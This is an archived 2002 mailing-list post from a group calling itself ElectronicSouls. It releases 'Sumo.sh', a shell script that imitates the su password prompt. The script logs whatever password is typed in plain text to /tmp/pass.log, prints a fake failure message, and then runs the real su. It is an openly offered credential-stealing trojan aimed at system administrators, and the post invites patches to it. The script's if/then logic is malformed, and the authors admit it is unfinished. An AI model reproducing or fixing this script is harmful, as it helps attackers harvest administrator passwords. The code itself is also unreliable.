lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Fake su

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have devised a way to write a fake su wrapper in a shellscript.  Our
shellscripting division has worked hard on this, but it still has a few
bugs!  Feel free to send us patches.

# cat Sumo.sh
#!/bin/sh
#
# Sumo.sh - Fake su
# (C) BrainStorm
# [ElectronicSouls]
#
# Simple script for really
# *stupid* admins ;>

echo "Password:";read pass
if [ $pass = "" ] > .es

echo "su: incorrect password"
echo $pass > /tmp/pass.log

then
rm .es
su
fi

# not finished yet ....

The Electronic Souls Crew
[ElectronicSouuls] (c) 2002

"Americanization that."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nEtoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltKFQAoIEV7iO3AXgy
1nox/NaNs4bvl1wDAJ9QpOZ8pBL0NNesceX42ZeAUz8LDQ==
=blQt
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ